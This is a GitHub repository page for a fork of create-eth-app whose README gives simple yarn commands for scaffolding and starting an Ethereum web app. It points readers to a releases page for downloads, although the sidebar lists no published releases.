Skip to content

🌐 Build Ethereum-powered apps effortlessly with Create Eth App—simply run one command to get started on macOS, Windows, or Linux.

License

Notifications You must be signed in to change notification settings

Chaudhryy/create-eth-app

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🚀 create-eth-app - Build Ethereum Apps Easily

Download create-eth-app

Create Ethereum-powered apps with one simple command.

Create Eth App works on macOS, Windows, and Linux. If you encounter any issues, please file an issue. For help or questions, join our Discord community.

📦 Download & Install

To start using create-eth-app, visit this page to download: Releases Page.

🚀 Getting Started

Follow these steps to create your first Ethereum app.

  1. Open Your Terminal:

    • On Windows, you can use Command Prompt or PowerShell.
    • On macOS, use Terminal.
    • On Linux, any terminal application will work.
  2. Install Yarn: Create Eth App requires Yarn to manage packages. If you haven't installed it, follow these steps:

    • Check if Yarn is installed by running:
      yarn --version
    • If not installed, find the installation guide here.
  3. Create a New App: Run the following command to create your Ethereum app. You can replace my-eth-app with any name you like:

    yarn create eth-app my-eth-app
  4. Change into Your App's Directory: Navigate to your new app folder:

    cd my-eth-app
  5. Start Your App: Launch your app by running:

    yarn react-app:start

Your app should now be running! Open your web browser and go to http://localhost:3000 to see it in action.

⚙️ System Requirements

Before you begin, ensure your system meets these requirements:

❓ Frequently Asked Questions

How do I uninstall create-eth-app?

If you have installed it globally, you can run the following command:

yarn global remove create-eth-app

Can I customize my app?

Yes, you can easily modify the files created in your app's directory to tailor it to your needs.

What if I face an issue?

Visit our issues page to report any problems. The community will assist you.

🌐 Community Support

Join our community for support and networking. You can ask questions, share your projects, or seek guidance.

Join our Discord: Discord Community

🌟 Features

  • Simple and quick creation of Ethereum apps.
  • Easy integration with libraries and tools.
  • Active community for support and guidance.

🔗 Helpful Links

For further updates, please check the Releases Page.

Happy coding!

About

🌐 Build Ethereum-powered apps effortlessly with Create Eth App—simply run one command to get started on macOS, Windows, or Linux.

Topics

Resources

License

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 4

  •  
  •  
  •  
  •